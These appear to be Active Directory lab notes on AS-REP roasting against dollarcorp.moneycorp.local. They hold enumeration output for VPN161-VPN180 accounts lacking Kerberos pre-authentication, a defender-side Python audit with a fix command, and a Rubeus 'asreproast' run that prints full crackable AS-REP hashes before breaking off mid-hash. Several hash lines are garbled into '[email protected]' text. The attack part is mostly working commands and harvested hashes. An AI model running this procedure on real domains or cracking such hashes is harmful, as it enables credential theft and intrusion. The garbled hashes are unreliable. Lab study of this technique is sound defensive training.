logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN171User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN171User
lastlogontimestamp : 7/3/2024 3:44:54 AM
userprincipalname : VPN171user
samaccountname : VPN171user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:54 AM
instancetype : 4
usncreated : 201462
objectguid : 767b9d56-90f9-450a-b0e1-68bee9485c80
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:05 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:05 AM, 1/1/1601 12:00:00 AM}
givenname : VPN171
usnchanged : 1481310
lastlogon : 7/3/2024 3:44:54 AM
badpwdcount : 0
cn : VPN171User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13671
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:05 AM
name : VPN171User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN172User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN172User
lastlogontimestamp : 7/3/2024 3:44:54 AM
userprincipalname : VPN172user
samaccountname : VPN172user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:54 AM
instancetype : 4
usncreated : 201469
objectguid : 4959eb44-0821-4d01-8de5-78f7656ab3fd
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:05 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:05 AM, 1/1/1601 12:00:00 AM}
givenname : VPN172
usnchanged : 1481314
lastlogon : 7/3/2024 3:44:54 AM
badpwdcount : 0
cn : VPN172User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13672
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:05 AM
name : VPN172User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN173User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN173User
lastlogontimestamp : 7/3/2024 3:44:54 AM
userprincipalname : VPN173user
samaccountname : VPN173user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:54 AM
instancetype : 4
usncreated : 201476
objectguid : 185ff3dd-be78-490e-9b23-e18cbda09e64
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:05 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:05 AM, 1/1/1601 12:00:00 AM}
givenname : VPN173
usnchanged : 1481316
lastlogon : 7/3/2024 3:44:54 AM
badpwdcount : 0
cn : VPN173User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13673
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:05 AM
name : VPN173User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN174User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN174User
lastlogontimestamp : 7/3/2024 3:44:54 AM
userprincipalname : VPN174user
samaccountname : VPN174user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:54 AM
instancetype : 4
usncreated : 201483
objectguid : bd32ff72-94f2-490a-b760-3baf1aef1da1
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:05 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:05 AM, 1/1/1601 12:00:00 AM}
givenname : VPN174
usnchanged : 1481317
lastlogon : 7/3/2024 3:44:54 AM
badpwdcount : 0
cn : VPN174User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13674
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:05 AM
name : VPN174User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN175User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN175User
lastlogontimestamp : 7/3/2024 3:44:54 AM
userprincipalname : VPN175user
samaccountname : VPN175user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:54 AM
instancetype : 4
usncreated : 201490
objectguid : 4810792d-c9a8-4458-922b-870f2ae3e543
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:05 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:05 AM, 1/1/1601 12:00:00 AM}
givenname : VPN175
usnchanged : 1481318
lastlogon : 7/3/2024 3:44:54 AM
badpwdcount : 0
cn : VPN175User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13675
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:05 AM
name : VPN175User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN176User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN176User
lastlogontimestamp : 7/3/2024 3:44:54 AM
userprincipalname : VPN176user
samaccountname : VPN176user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:54 AM
instancetype : 4
usncreated : 201497
objectguid : 80ad17e9-8fbf-4a1a-b767-7baa09339a77
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:05 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:06 AM, 1/1/1601 12:00:00 AM}
givenname : VPN176
usnchanged : 1481319
lastlogon : 7/3/2024 3:44:54 AM
badpwdcount : 0
cn : VPN176User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13676
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:05 AM
name : VPN176User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN177User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN177User
lastlogontimestamp : 7/3/2024 3:44:54 AM
userprincipalname : VPN177user
samaccountname : VPN177user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:54 AM
instancetype : 4
usncreated : 201504
objectguid : a37555a4-68cf-4910-8279-04f0595b857d
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:06 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:06 AM, 1/1/1601 12:00:00 AM}
givenname : VPN177
usnchanged : 1481327
lastlogon : 7/3/2024 3:44:54 AM
badpwdcount : 0
cn : VPN177User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13677
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:06 AM
name : VPN177User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN178User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN178User
lastlogontimestamp : 7/3/2024 3:44:54 AM
userprincipalname : VPN178user
samaccountname : VPN178user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:54 AM
instancetype : 4
usncreated : 201511
objectguid : dd7c24f4-5da7-4df0-9d8a-08719ae7c049
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:06 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:06 AM, 1/1/1601 12:00:00 AM}
givenname : VPN178
usnchanged : 1481330
lastlogon : 7/3/2024 3:44:54 AM
badpwdcount : 0
cn : VPN178User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13678
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:06 AM
name : VPN178User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN179User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN179User
lastlogontimestamp : 7/3/2024 3:44:54 AM
userprincipalname : VPN179user
samaccountname : VPN179user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:54 AM
instancetype : 4
usncreated : 201518
objectguid : 6fe94140-0e17-4930-b19b-dcd66ca01be0
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:06 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:06 AM, 1/1/1601 12:00:00 AM}
givenname : VPN179
usnchanged : 1481332
lastlogon : 7/3/2024 3:44:54 AM
badpwdcount : 0
cn : VPN179User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13679
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:06 AM
name : VPN179User

logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=VPN180User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : VPN180User
lastlogontimestamp : 7/3/2024 3:44:55 AM
userprincipalname : VPN180user
samaccountname : VPN180user
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/3/2024 10:44:55 AM
instancetype : 4
usncreated : 201525
objectguid : 0c84d267-0b29-4334-9b30-6ed05e2cf02f
sn : user
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:30:06 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:30:06 AM, 1/1/1601 12:00:00 AM}
givenname : VPN180
usnchanged : 1481333
lastlogon : 7/3/2024 3:44:55 AM
badpwdcount : 0
cn : VPN180User
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTH
objectsid : S-1-5-21-719815819-3726368948-3917688648-13680
primarygroupid : 513
pwdlastset : 2/21/2024 2:30:06 AM
name : VPN180User

Using AD Module
PS C:\Windows\system32> Get-ADUser -Filter { DoesnotRequirePreAuth -eq $True } -Properties DoesnotRequirePreAuth

DistinguishedName : CN=VPN161User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN161
Name : VPN161User
ObjectClass : user
ObjectGUID : 1d7faaf7-233f-483d-8e17-bcc34c86d6c6
SamAccountName : VPN161user
SID : S-1-5-21-719815819-3726368948-3917688648-13661
Surname : user
UserPrincipalName : VPN161user

DistinguishedName : CN=VPN162User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN162
Name : VPN162User
ObjectClass : user
ObjectGUID : a0229c64-9da4-43d9-88be-eb00bd946fc8
SamAccountName : VPN162user
SID : S-1-5-21-719815819-3726368948-3917688648-13662
Surname : user
UserPrincipalName : VPN162user

DistinguishedName : CN=VPN163User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN163
Name : VPN163User
ObjectClass : user
ObjectGUID : 236ab7bf-a8bd-4e99-8ffa-12bdf7e2f61b
SamAccountName : VPN163user
SID : S-1-5-21-719815819-3726368948-3917688648-13663
Surname : user
UserPrincipalName : VPN163user

DistinguishedName : CN=VPN164User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN164
Name : VPN164User
ObjectClass : user
ObjectGUID : 11210222-24cf-4b41-837d-25f53751852b
SamAccountName : VPN164user
SID : S-1-5-21-719815819-3726368948-3917688648-13664
Surname : user
UserPrincipalName : VPN164user

DistinguishedName : CN=VPN165User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN165
Name : VPN165User
ObjectClass : user
ObjectGUID : 19f3740a-7d2f-45cd-96f1-db8890792d2c
SamAccountName : VPN165user
SID : S-1-5-21-719815819-3726368948-3917688648-13665
Surname : user
UserPrincipalName : VPN165user

DistinguishedName : CN=VPN166User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN166
Name : VPN166User
ObjectClass : user
ObjectGUID : 5fc085fc-3daa-496b-aea4-0a922a098090
SamAccountName : VPN166user
SID : S-1-5-21-719815819-3726368948-3917688648-13666
Surname : user
UserPrincipalName : VPN166user

DistinguishedName : CN=VPN167User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN167
Name : VPN167User
ObjectClass : user
ObjectGUID : 684ed5a2-237d-40de-a794-028b67a37c00
SamAccountName : VPN167user
SID : S-1-5-21-719815819-3726368948-3917688648-13667
Surname : user
UserPrincipalName : VPN167user

DistinguishedName : CN=VPN168User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN168
Name : VPN168User
ObjectClass : user
ObjectGUID : 3fa6a688-e880-4324-b6b6-c6a9bd57b2a0
SamAccountName : VPN168user
SID : S-1-5-21-719815819-3726368948-3917688648-13668
Surname : user
UserPrincipalName : VPN168user

DistinguishedName : CN=VPN169User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN169
Name : VPN169User
ObjectClass : user
ObjectGUID : 6ee585d2-017a-4254-a8c8-9480529f4330
SamAccountName : VPN169user
SID : S-1-5-21-719815819-3726368948-3917688648-13669
Surname : user
UserPrincipalName : VPN169user

DistinguishedName : CN=VPN170User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN170
Name : VPN170User
ObjectClass : user
ObjectGUID : 0ca9fa48-b3b9-4c83-9ddc-95470629fd25
SamAccountName : VPN170user
SID : S-1-5-21-719815819-3726368948-3917688648-13670
Surname : user
UserPrincipalName : VPN170user

DistinguishedName : CN=VPN171User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN171
Name : VPN171User
ObjectClass : user
ObjectGUID : 767b9d56-90f9-450a-b0e1-68bee9485c80
SamAccountName : VPN171user
SID : S-1-5-21-719815819-3726368948-3917688648-13671
Surname : user
UserPrincipalName : VPN171user

DistinguishedName : CN=VPN172User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN172
Name : VPN172User
ObjectClass : user
ObjectGUID : 4959eb44-0821-4d01-8de5-78f7656ab3fd
SamAccountName : VPN172user
SID : S-1-5-21-719815819-3726368948-3917688648-13672
Surname : user
UserPrincipalName : VPN172user

DistinguishedName : CN=VPN173User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN173
Name : VPN173User
ObjectClass : user
ObjectGUID : 185ff3dd-be78-490e-9b23-e18cbda09e64
SamAccountName : VPN173user
SID : S-1-5-21-719815819-3726368948-3917688648-13673
Surname : user
UserPrincipalName : VPN173user

DistinguishedName : CN=VPN174User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN174
Name : VPN174User
ObjectClass : user
ObjectGUID : bd32ff72-94f2-490a-b760-3baf1aef1da1
SamAccountName : VPN174user
SID : S-1-5-21-719815819-3726368948-3917688648-13674
Surname : user
UserPrincipalName : VPN174user

DistinguishedName : CN=VPN175User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN175
Name : VPN175User
ObjectClass : user
ObjectGUID : 4810792d-c9a8-4458-922b-870f2ae3e543
SamAccountName : VPN175user
SID : S-1-5-21-719815819-3726368948-3917688648-13675
Surname : user
UserPrincipalName : VPN175user

DistinguishedName : CN=VPN176User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN176
Name : VPN176User
ObjectClass : user
ObjectGUID : 80ad17e9-8fbf-4a1a-b767-7baa09339a77
SamAccountName : VPN176user
SID : S-1-5-21-719815819-3726368948-3917688648-13676
Surname : user
UserPrincipalName : VPN176user

DistinguishedName : CN=VPN177User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN177
Name : VPN177User
ObjectClass : user
ObjectGUID : a37555a4-68cf-4910-8279-04f0595b857d
SamAccountName : VPN177user
SID : S-1-5-21-719815819-3726368948-3917688648-13677
Surname : user
UserPrincipalName : VPN177user

DistinguishedName : CN=VPN178User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN178
Name : VPN178User
ObjectClass : user
ObjectGUID : dd7c24f4-5da7-4df0-9d8a-08719ae7c049
SamAccountName : VPN178user
SID : S-1-5-21-719815819-3726368948-3917688648-13678
Surname : user
UserPrincipalName : VPN178user

DistinguishedName : CN=VPN179User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN179
Name : VPN179User
ObjectClass : user
ObjectGUID : 6fe94140-0e17-4930-b19b-dcd66ca01be0
SamAccountName : VPN179user
SID : S-1-5-21-719815819-3726368948-3917688648-13679
Surname : user
UserPrincipalName : VPN179user

DistinguishedName : CN=VPN180User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
DoesNotRequirePreAuth : True
Enabled : True
GivenName : VPN180
Name : VPN180User
ObjectClass : user
ObjectGUID : 0c84d267-0b29-4334-9b30-6ed05e2cf02f
SamAccountName : VPN180user
SID : S-1-5-21-719815819-3726368948-3917688648-13680
Surname : user
UserPrincipalName : VPN180user
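
The LDAP filter PowerView prints above (and Rubeus prints below) is a bitwise AND on userAccountControl (matching rule 1.2.840.113556.1.4.803) against 4194304, the DONT_REQ_PREAUTH bit. The added Python below, which is not part of the lab notes or of either tool, decodes the relevant bits, rebuilds that filter, and runs a small defender-side audit over constructed user records shaped like the output above: accounts whose password also never expires rank highest, and disabled accounts are skipped because the KDC refuses them, so no crackable AS-REP is issued for them.

```python
# userAccountControl bits used by the enumeration above (schema-defined values)
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",   # 4194304: "Do not require Kerberos preauthentication"
}
DONT_REQ_PREAUTH = 0x400000
SAM_USER_OBJECT = 805306368                   # samAccountType of user objects
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"

# Constructed records in the shape of the PowerView output; not real directory data
SAMPLE_USERS = [
    {"samaccountname": "VPN161user", "useraccountcontrol": 0x410200},  # no pre-auth, pwd never expires
    {"samaccountname": "svcbackup",  "useraccountcontrol": 0x10200},   # pre-auth required
    {"samaccountname": "contractor", "useraccountcontrol": 0x400200},  # no pre-auth, pwd expires
    {"samaccountname": "olduser",    "useraccountcontrol": 0x400202},  # no pre-auth but disabled
]


def decode_uac(value):
    """Return the names of the known flags set in a userAccountControl value."""
    return {name for bit, name in UAC_FLAGS.items() if value & bit}


def preauth_not_required_filter():
    """Rebuild the filter PowerView/Rubeus use: user objects whose UAC has the
    DONT_REQ_PREAUTH bit set (the :1.2.840.113556.1.4.803: rule is a bitwise AND)."""
    return "(&(samAccountType=%d)(userAccountControl:%s:=%d))" % (
        SAM_USER_OBJECT, LDAP_MATCHING_RULE_BIT_AND, DONT_REQ_PREAUTH)


def matches_filter(user):
    """Evaluate the same condition locally, as the DC does for that filter."""
    return bool(user["useraccountcontrol"] & DONT_REQ_PREAUTH)


def audit_preauth(users):
    """Defender-side triage: which enabled accounts can be AS-REP roasted, and how bad.
    A password that never rotates keeps a cracked result valid indefinitely."""
    findings = []
    for u in users:
        if not matches_filter(u):
            continue
        flags = decode_uac(u["useraccountcontrol"])
        if "ACCOUNTDISABLE" in flags:
            continue  # KDC returns an error for disabled accounts, nothing to crack
        severity = "high" if "DONT_EXPIRE_PASSWORD" in flags else "medium"
        findings.append({"sam": u["samaccountname"], "severity": severity,
                         "flags": sorted(flags)})
    return sorted(findings, key=lambda f: (f["severity"] != "high", f["sam"]))


if __name__ == "__main__":
    print(preauth_not_required_filter())
    for f in audit_preauth(SAMPLE_USERS):
        print(f["severity"], f["sam"], ",".join(f["flags"]))
```

The filter string the function builds is character-for-character the one in the PowerView verbose output above, which is a useful check when writing your own LDAP queries. For each finding, the AD module fix is `Set-ADAccountControl -Identity <sam> -DoesNotRequirePreAuth $false`, followed by a password change for the account if the roasting may already have happened.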

Using Rubeus
C:\Windows\system32>C:\AD\Tools\Rubeus.exe asreproast

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: AS-REP roasting

[*] Target Domain : dollarcorp.moneycorp.local

[*] Searching path 'LDAP://dcorp-dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))'
[*] SamAccountName : VPN161user
[*] DistinguishedName : CN=VPN161User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN161user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

$krb5asrep$VPN161user@dollarcorp.moneycorp.local:2AF3B8BCA0C9C56A893AF64E84E4FE5
A$59235D67FA700D66223211FA7FBF2A74933C448751C9B93E727522EBFF37778BE0B2F169DBD463
92E61AB01B0F7066FE83E0CCB32E7C314412D311A8B54B64397D68BE1499A566D8A0A420F8F2557D
E857F42393DBA148A421547847A378695234474E85CFB28FCDCC5709BA2FB3A7D40848E54E75F43C
2A017FC070760A695B23FD545184132BC379A2116014678A1BDFB418A4CAEE3D231A200242ACF3F3
BFD4058FE3F52171A20CA7D5C6F903D43DDD6E06849F9BA0586892CA55797B52CEA1BE15C9A7788B
C32AE26D1CC7ACB0465D37470552E0DABCDD37945701753F033B26EF395197574C5A5B7754016B40
4B1810E9E0D056F0DF28976ADC618A9950EFD79D165CF6E788

[*] SamAccountName : VPN162user
[*] DistinguishedName : CN=VPN162User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN162user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

$krb5asrep$VPN162user@dollarcorp.moneycorp.local:72C74EDEC1C0A7B5CEFFAC3CEA08FD5
2$E1F50CF32FA22D20C4E9D0DA4015426C52222C36DC234402A63F7A271E9A46512622A4F6D6F5E7
0B2357800070158B97E45C76B613A3015A44C7B5E4BFC7F368F06597DFC713B460F8934AB1525F27
438AF31AAC607CE2A40E9930AC7CE83D5446D3EAE6FC8870E5C10BD6609B47C5E29CE7F116826BDD
3B1A4EB7F40C9E76F6C10CB8748AC8471D8B46BFE4ABA219E7D351B872413DF865EAEEF11EFE4C99
4A19401A6242B1EBC0304E1D7D7E5D7474BC63EA0BB79868182A5546859E89332AB3602B533B496D
D1C5737F8FD2D3ED84E0B11C63E8244A75749003AEB15AB10DB3DA2289A4F4C8E7EC2E29400F0490
82675E732CB37D7123BCC274E72A239A5159496EA45E41BB65

[*] SamAccountName : VPN163user
[*] DistinguishedName : CN=VPN163User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN163user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:209E3B10BAD756C81B28AE13D2B9D0A
C$452A4411F1A7EE0BD3EF015413B99AFB954E71102A7E8E23D98725B4B94F46204A52EF8E6B453C
227AE3D9845C70A60FB84BF8D1823258303B785DC5B9C304BB6420E14789CA1607455D9DA1C67682
548AB2B922A4FC9934CF941089130FB56DEDAAD9C2459D34B4B33BD97CE45871DDD26BE4CFE1A8C4
2D9211BE3BEE50C880F373C1FEAE5BEED4DCEAFBCF614B724FF46DDBACDE7B0D2627C5D592B93474
576AC08137AC57EB76F54B63A85F8EEF8B8DEC7AC120481AF98DC704C9A5EC5EA898219B3B0A3302
BAEAD1569ED4D1F70159340434D2B5FA9EB091A720ACD3CFFDF66B532DAE33F14EA5666FE3202927
3D5EFCB0DBC89CED819F70E27C65115944FA71E7A49BB045AD

[*] SamAccountName : VPN164user
[*] DistinguishedName : CN=VPN164User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN164user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:9C54EB0C2C1FCDE05C9FDEE942805F3
0$A3EF4B34EE941E6D278F1AA02005542A1A532743F9D8B8D89672A2E77AAFE68950C8D5D07386BF
671F14B747D1E2F2894A61E4CD70935CC368F5AF2090180B5540D5D5358FAE757F9FB7C210B051EA
EF6F7E78D9DF0FF49871067CB98A7DABD8D4C3B5B542F49FBF3927E2BEAD7152F997791D2EA8586B
F08B3ECFF4435EBB9B6C98F2AC66B846ADAE3FA4040946EFDBB20659666F1CA2533C0C8E1D15B610
5DAF337E22F3B22A21C25F63D7B1320A3FFC75D200A64DC95CB485141180346BC6E99DFEF106D46C
7E622603E97CD4BF7EF442E2504D61B84168559A528DCA2E860450F87173E25BE450F57BA34E353E
7EE905B26D39F24063B576F02B7F354CD01E3E9DFDD3BC347E

[*] SamAccountName : VPN165user
[*] DistinguishedName : CN=VPN165User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN165user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:64818A374AD93EFC6F810B96A1793C0
6$015D801140A8B31E9C6572C5C5FEDFABCEFFD7F2769A9E96E11DC7180124B3B3ECD5CAF8E342E3
E79E37287091F13C020775D476DD638482DB3D98E46B9B95F1C83EC9A69742D262B7EBA45306FF67
5DEBB4D89B23BE1637C70C8611DAD2724B3C6EFFA09B8233AFCF6BFD129AC1D1ECAC3EA81B34E76D
3382814545C6D961BBD4354B148F341BE3B64702BEB6D05508C8C4749FB11A906BA996FB466743F6
617C206B4B7FC8E79E9E4C55172630FC1DD2B8EEE9C07805E8E170A2DA632F4330BFB168377E4100
F02E530212237DAFB8D0F981B23F89CFD1B051A20A9CDE081879DBB8146E624E5094F09D00BD4399
2BA4ADA732B2190F3A810FCD6CC2A4CFACBE6E360385187F0A

[*] SamAccountName : VPN166user
[*] DistinguishedName : CN=VPN166User,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Building AS-REQ (w/o preauth) for: 'dollarcorp.moneycorp.local\VPN166user'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

[email protected]:D16B1099D006FDB9493692487B2BADA
